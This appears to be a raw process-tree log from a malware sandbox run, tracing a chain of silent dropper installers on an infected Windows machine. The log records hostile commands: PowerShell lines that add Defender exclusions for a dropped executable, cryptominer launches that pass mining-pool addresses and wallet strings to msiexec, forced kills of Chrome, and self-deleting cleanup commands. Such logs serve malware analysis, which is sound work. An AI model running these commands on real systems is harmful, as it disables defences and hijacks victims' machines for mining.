-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"22⤵PID:9720
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"22⤵PID:2672
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"22⤵PID:9464
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵PID:5896
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵PID:8344
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pugnflnhnm0\vict.exe"C:\Users\Admin\AppData\Local\Temp\pugnflnhnm0\vict.exe" /VERYSILENT /id=53520⤵PID:5032
-
C:\Users\Admin\AppData\Local\Temp\is-UC1PL.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-UC1PL.tmp\vict.tmp" /SL5="$4086E,870426,780800,C:\Users\Admin\AppData\Local\Temp\pugnflnhnm0\vict.exe" /VERYSILENT /id=53521⤵PID:7980
-
C:\Users\Admin\AppData\Local\Temp\is-CBLA1.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-CBLA1.tmp\win1host.exe" 53522⤵PID:3472
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xjan1tgsevd\vpn.exe"C:\Users\Admin\AppData\Local\Temp\xjan1tgsevd\vpn.exe" /silent /subid=48220⤵PID:8516
-
C:\Users\Admin\AppData\Local\Temp\is-E8810.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-E8810.tmp\vpn.tmp" /SL5="$50594,15170975,270336,C:\Users\Admin\AppData\Local\Temp\xjan1tgsevd\vpn.exe" /silent /subid=48221⤵PID:7384
-
-
-
C:\Users\Admin\AppData\Local\Temp\ie052jvvolp\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ie052jvvolp\Setup3310.exe" /Verysilent /subid=57720⤵PID:8520
-
C:\Users\Admin\AppData\Local\Temp\is-B09C7.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-B09C7.tmp\Setup3310.tmp" /SL5="$301A6,138429,56832,C:\Users\Admin\AppData\Local\Temp\ie052jvvolp\Setup3310.exe" /Verysilent /subid=57721⤵PID:7524
-
C:\Users\Admin\AppData\Local\Temp\is-MJENU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MJENU.tmp\Setup.exe" /Verysilent22⤵PID:6748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\iw5acha53rs\app.exe"C:\Users\Admin\AppData\Local\Temp\iw5acha53rs\app.exe" /8-2320⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Users\Admin\AppData\Local\Temp\poqum3llo0h\3nemuxfebu3.exe"C:\Users\Admin\AppData\Local\Temp\poqum3llo0h\3nemuxfebu3.exe" /ustwo INSTALL20⤵PID:5632
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "3nemuxfebu3.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\poqum3llo0h\3nemuxfebu3.exe" & exit21⤵PID:7912
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "3nemuxfebu3.exe" /f22⤵
- Kills process with taskkill
PID:7628
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3XK72A2Y4O\setups.exe"C:\Users\Admin\AppData\Local\Temp\3XK72A2Y4O\setups.exe" ll17⤵PID:5408
-
C:\Users\Admin\AppData\Local\Temp\is-ONFNB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-ONFNB.tmp\setups.tmp" /SL5="$2073E,635399,250368,C:\Users\Admin\AppData\Local\Temp\3XK72A2Y4O\setups.exe" ll18⤵PID:9184
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\af-76b4f-285-7329c-8ec05fd312057\Laelonesishae.exe"C:\Users\Admin\AppData\Local\Temp\af-76b4f-285-7329c-8ec05fd312057\Laelonesishae.exe"14⤵PID:2036
-
-
C:\Program Files\Google\RUSHOOOZDK\prolab.exe"C:\Program Files\Google\RUSHOOOZDK\prolab.exe" /VERYSILENT14⤵PID:2112
-
C:\Users\Admin\AppData\Local\Temp\is-4U4L8.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-4U4L8.tmp\prolab.tmp" /SL5="$4042A,575243,216576,C:\Program Files\Google\RUSHOOOZDK\prolab.exe" /VERYSILENT15⤵PID:3568
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:5664
-
C:\Users\Admin\AppData\Local\Temp\is-LU7LB.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-LU7LB.tmp\lylal220.tmp" /SL5="$501E0,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"12⤵PID:5808
-
C:\Users\Admin\AppData\Local\Temp\is-GF6K9.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-GF6K9.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:4336
-
C:\Program Files\Windows Portable Devices\SBESQKRXND\irecord.exe"C:\Program Files\Windows Portable Devices\SBESQKRXND\irecord.exe" /VERYSILENT14⤵PID:4356
-
C:\Users\Admin\AppData\Local\Temp\is-358CK.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-358CK.tmp\irecord.tmp" /SL5="$30288,6265333,408064,C:\Program Files\Windows Portable Devices\SBESQKRXND\irecord.exe" /VERYSILENT15⤵PID:3904
-
-
-
C:\Users\Admin\AppData\Local\Temp\e9-1fbb0-bc5-879b0-a67aa762bcf2f\Sufulumorae.exe"C:\Users\Admin\AppData\Local\Temp\e9-1fbb0-bc5-879b0-a67aa762bcf2f\Sufulumorae.exe"14⤵PID:4104
-
-
C:\Users\Admin\AppData\Local\Temp\f0-a29cc-1da-92592-4eee157b7fdac\Cymupimahae.exe"C:\Users\Admin\AppData\Local\Temp\f0-a29cc-1da-92592-4eee157b7fdac\Cymupimahae.exe"14⤵PID:196
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01de0jjq.tr0\md6_6ydj.exe & exit15⤵PID:7052
-
C:\Users\Admin\AppData\Local\Temp\01de0jjq.tr0\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\01de0jjq.tr0\md6_6ydj.exe16⤵PID:5056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mwrwx0ml.uzl\askinstall31.exe & exit15⤵PID:6664
-
C:\Users\Admin\AppData\Local\Temp\mwrwx0ml.uzl\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\mwrwx0ml.uzl\askinstall31.exe16⤵PID:6316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mpaof4xm.3id\toolspab1.exe & exit15⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\mpaof4xm.3id\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\mpaof4xm.3id\toolspab1.exe16⤵PID:6548
-
C:\Users\Admin\AppData\Local\Temp\mpaof4xm.3id\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\mpaof4xm.3id\toolspab1.exe17⤵PID:300
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3wsqdics.npr\setup_10.2_mix.exe & exit15⤵PID:1424
-
C:\Users\Admin\AppData\Local\Temp\3wsqdics.npr\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\3wsqdics.npr\setup_10.2_mix.exe16⤵PID:8064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xzae0yaw.p0j\GcleanerWW.exe /mixone & exit15⤵PID:6240
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xifffr5q.iym\app.exe /8-2222 & exit15⤵PID:7284
-
C:\Users\Admin\AppData\Local\Temp\xifffr5q.iym\app.exeC:\Users\Admin\AppData\Local\Temp\xifffr5q.iym\app.exe /8-222216⤵PID:7172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tou4zizk.kle\file.exe & exit15⤵PID:7832
-
C:\Users\Admin\AppData\Local\Temp\tou4zizk.kle\file.exeC:\Users\Admin\AppData\Local\Temp\tou4zizk.kle\file.exe16⤵PID:6276
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:5504
-
C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:8808
-
C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe" 1 3.1617432615.60681027191c6 10119⤵PID:8196
-
C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\DUBMLEWFXA\multitimer.exe" 2 3.1617432615.60681027191c620⤵PID:8972
-
C:\Users\Admin\AppData\Local\Temp\cbmuskov2n1\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\cbmuskov2n1\cpyrix.exe" /VERYSILENT21⤵PID:6688
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵PID:4456
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"23⤵PID:9660
-
-
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵PID:7792
-
C:\Users\Admin\AppData\Local\Temp\5b3252d2-bf0e-4e86-8a5c-536d18c24df9\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5b3252d2-bf0e-4e86-8a5c-536d18c24df9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5b3252d2-bf0e-4e86-8a5c-536d18c24df9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run23⤵PID:5652
-
C:\Users\Admin\AppData\Local\Temp\5b3252d2-bf0e-4e86-8a5c-536d18c24df9\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5b3252d2-bf0e-4e86-8a5c-536d18c24df9\AdvancedRun.exe" /SpecialRun 4101d8 565224⤵PID:9516
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force23⤵PID:9940
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 123⤵PID:9932
-
C:\Windows\SysWOW64\timeout.exetimeout 124⤵
- Delays execution with timeout.exe
PID:8264
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"23⤵PID:9868
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"23⤵PID:8928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zui3vpk4w1g\vpn.exe"C:\Users\Admin\AppData\Local\Temp\zui3vpk4w1g\vpn.exe" /silent /subid=48221⤵PID:8912
-
C:\Users\Admin\AppData\Local\Temp\is-R7H9E.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-R7H9E.tmp\vpn.tmp" /SL5="$40532,15170975,270336,C:\Users\Admin\AppData\Local\Temp\zui3vpk4w1g\vpn.exe" /silent /subid=48222⤵PID:4432
-
-
-
C:\Users\Admin\AppData\Local\Temp\n3xczhaeijb\app.exe"C:\Users\Admin\AppData\Local\Temp\n3xczhaeijb\app.exe" /8-2321⤵PID:4816
-
-
C:\Users\Admin\AppData\Local\Temp\4asrchmyt3u\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\4asrchmyt3u\Setup3310.exe" /Verysilent /subid=57721⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\is-IVQO1.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-IVQO1.tmp\Setup3310.tmp" /SL5="$40592,138429,56832,C:\Users\Admin\AppData\Local\Temp\4asrchmyt3u\Setup3310.exe" /Verysilent /subid=57722⤵PID:9120
-
C:\Users\Admin\AppData\Local\Temp\is-Q2V2N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-Q2V2N.tmp\Setup.exe" /Verysilent23⤵PID:2684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wzge32hxd1n\vromk0iloz1.exe"C:\Users\Admin\AppData\Local\Temp\wzge32hxd1n\vromk0iloz1.exe" /ustwo INSTALL21⤵PID:4452
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "vromk0iloz1.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\wzge32hxd1n\vromk0iloz1.exe" & exit22⤵PID:9612
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "vromk0iloz1.exe" /f23⤵
- Kills process with taskkill
PID:9800
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yavp5rayetv\vict.exe"C:\Users\Admin\AppData\Local\Temp\yavp5rayetv\vict.exe" /VERYSILENT /id=53521⤵PID:9080
-
C:\Users\Admin\AppData\Local\Temp\is-3LM6T.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-3LM6T.tmp\vict.tmp" /SL5="$4058C,870426,780800,C:\Users\Admin\AppData\Local\Temp\yavp5rayetv\vict.exe" /VERYSILENT /id=53522⤵PID:6088
-
C:\Users\Admin\AppData\Local\Temp\is-81O5G.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-81O5G.tmp\win1host.exe" 53523⤵PID:7028
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B0QRWLLOV0\setups.exe"C:\Users\Admin\AppData\Local\Temp\B0QRWLLOV0\setups.exe" ll18⤵PID:8216
-
C:\Users\Admin\AppData\Local\Temp\is-ET8JQ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-ET8JQ.tmp\setups.tmp" /SL5="$40556,635399,250368,C:\Users\Admin\AppData\Local\Temp\B0QRWLLOV0\setups.exe" ll19⤵PID:8676
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"17⤵PID:8456
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:9100
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:7328
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"17⤵PID:9104
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"18⤵PID:5880
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install19⤵PID:6416
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵PID:6912
-
C:\Users\Admin\AppData\Roaming\5C4C.tmp.exe"C:\Users\Admin\AppData\Roaming\5C4C.tmp.exe"18⤵PID:4604
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:4020
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵PID:6656
-
-
-
C:\Users\Admin\AppData\Roaming\5D95.tmp.exe"C:\Users\Admin\AppData\Roaming\5D95.tmp.exe"18⤵PID:5560
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\5D95.tmp.exe19⤵PID:7364
-
C:\Windows\SysWOW64\timeout.exetimeout /t 320⤵
- Delays execution with timeout.exe
PID:5352
-
-
-
-
C:\Users\Admin\AppData\Roaming\37EB.tmp.exe"C:\Users\Admin\AppData\Roaming\37EB.tmp.exe"18⤵PID:2340
-
C:\Users\Admin\AppData\Roaming\37EB.tmp.exe"C:\Users\Admin\AppData\Roaming\37EB.tmp.exe"19⤵PID:7616
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"18⤵PID:6152
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:9880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"17⤵PID:8648
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bufv3mzx.o2n\Four.exe & exit15⤵PID:8052
-
C:\Users\Admin\AppData\Local\Temp\bufv3mzx.o2n\Four.exeC:\Users\Admin\AppData\Local\Temp\bufv3mzx.o2n\Four.exe16⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:8280
-
C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe" 1 3.1617432612.606810248a3db 10418⤵PID:4748
-
C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MMHI0EPUXF\multitimer.exe" 2 3.1617432612.606810248a3db19⤵PID:9020
-
C:\Users\Admin\AppData\Local\Temp\tygpkkyu44o\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\tygpkkyu44o\Setup3310.exe" /Verysilent /subid=57720⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\is-POFVP.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-POFVP.tmp\Setup3310.tmp" /SL5="$50134,138429,56832,C:\Users\Admin\AppData\Local\Temp\tygpkkyu44o\Setup3310.exe" /Verysilent /subid=57721⤵PID:7436
-
C:\Users\Admin\AppData\Local\Temp\is-3O7IK.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3O7IK.tmp\Setup.exe" /Verysilent22⤵PID:4416
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pykmtxcyv5z\sovfflxlgtf.exe"C:\Users\Admin\AppData\Local\Temp\pykmtxcyv5z\sovfflxlgtf.exe" /ustwo INSTALL20⤵PID:5568
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "sovfflxlgtf.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\pykmtxcyv5z\sovfflxlgtf.exe" & exit21⤵PID:4472
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "sovfflxlgtf.exe" /f22⤵
- Kills process with taskkill
PID:8428
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\p2o4toavhkt\vict.exe"C:\Users\Admin\AppData\Local\Temp\p2o4toavhkt\vict.exe" /VERYSILENT /id=53520⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\is-OLP9V.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-OLP9V.tmp\vict.tmp" /SL5="$30592,870426,780800,C:\Users\Admin\AppData\Local\Temp\p2o4toavhkt\vict.exe" /VERYSILENT /id=53521⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\is-RDB0J.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-RDB0J.tmp\win1host.exe" 53522⤵PID:8336
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\w45gyd5tvry\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\w45gyd5tvry\cpyrix.exe" /VERYSILENT20⤵PID:7368
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe21⤵PID:4940
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵PID:8332
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵PID:9540
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"22⤵PID:9688
-
-
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe21⤵PID:5112
-
C:\Users\Admin\AppData\Local\Temp\48b31c34-3424-4246-9149-2cf77c70766a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\48b31c34-3424-4246-9149-2cf77c70766a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\48b31c34-3424-4246-9149-2cf77c70766a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run22⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\48b31c34-3424-4246-9149-2cf77c70766a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\48b31c34-3424-4246-9149-2cf77c70766a\AdvancedRun.exe" /SpecialRun 4101d8 200023⤵PID:9056
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force22⤵PID:7368
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 122⤵PID:6688
-
C:\Windows\SysWOW64\timeout.exetimeout 123⤵
- Delays execution with timeout.exe
PID:9752
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"22⤵PID:4808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 111222⤵
- Program crash
PID:7908
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\h5ar5v1sliu\app.exe"C:\Users\Admin\AppData\Local\Temp\h5ar5v1sliu\app.exe" /8-2320⤵PID:5996
-
-
C:\Users\Admin\AppData\Local\Temp\jcconqudzz0\vpn.exe"C:\Users\Admin\AppData\Local\Temp\jcconqudzz0\vpn.exe" /silent /subid=48220⤵PID:7816
-
C:\Users\Admin\AppData\Local\Temp\is-UC6IA.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-UC6IA.tmp\vpn.tmp" /SL5="$1081C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jcconqudzz0\vpn.exe" /silent /subid=48221⤵PID:7752
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RBHOF1H54J\setups.exe"C:\Users\Admin\AppData\Local\Temp\RBHOF1H54J\setups.exe" ll17⤵PID:8704
-
C:\Users\Admin\AppData\Local\Temp\is-N5QSN.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-N5QSN.tmp\setups.tmp" /SL5="$802BC,635399,250368,C:\Users\Admin\AppData\Local\Temp\RBHOF1H54J\setups.exe" ll18⤵PID:8872
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵PID:4704
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:2832
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:3392
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:648
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:2600
-
C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe" 1 3.1617432495.60680faf7e532 10313⤵PID:5284
-
C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0LDIZ0RWYI\multitimer.exe" 2 3.1617432495.60680faf7e53214⤵PID:4420
-
C:\Users\Admin\AppData\Local\Temp\0op13rmy10g\app.exe"C:\Users\Admin\AppData\Local\Temp\0op13rmy10g\app.exe" /8-2315⤵PID:7136
-
-
C:\Users\Admin\AppData\Local\Temp\hq1b3baiw22\vpn.exe"C:\Users\Admin\AppData\Local\Temp\hq1b3baiw22\vpn.exe" /silent /subid=48215⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\is-7LB7K.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-7LB7K.tmp\vpn.tmp" /SL5="$6046A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\hq1b3baiw22\vpn.exe" /silent /subid=48216⤵PID:5392
-
-
-
C:\Users\Admin\AppData\Local\Temp\wuobpdm2kvq\vict.exe"C:\Users\Admin\AppData\Local\Temp\wuobpdm2kvq\vict.exe" /VERYSILENT /id=53515⤵PID:7156
-
C:\Users\Admin\AppData\Local\Temp\is-USGL0.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-USGL0.tmp\vict.tmp" /SL5="$502F2,870426,780800,C:\Users\Admin\AppData\Local\Temp\wuobpdm2kvq\vict.exe" /VERYSILENT /id=53516⤵PID:2212
-
C:\Users\Admin\AppData\Local\Temp\is-9EAEF.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-9EAEF.tmp\win1host.exe" 53517⤵PID:6856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v01fwumddr4\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\v01fwumddr4\Setup3310.exe" /Verysilent /subid=57715⤵PID:7148
-
-
C:\Users\Admin\AppData\Local\Temp\511zpfnxt1g\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\511zpfnxt1g\cpyrix.exe" /VERYSILENT15⤵PID:7116
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\4e80912a-c9a2-4d9c-a221-a6fab1e8bdcd\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\4e80912a-c9a2-4d9c-a221-a6fab1e8bdcd\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\4e80912a-c9a2-4d9c-a221-a6fab1e8bdcd\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\4e80912a-c9a2-4d9c-a221-a6fab1e8bdcd\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\4e80912a-c9a2-4d9c-a221-a6fab1e8bdcd\AdvancedRun.exe" /SpecialRun 4101d8 576418⤵PID:4592
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force17⤵PID:7624
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 117⤵PID:7692
-
C:\Windows\SysWOW64\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
PID:7360
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵PID:8156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4436 -s 198017⤵
- Program crash
PID:4804
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:5104
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:1968
-
-
-
-
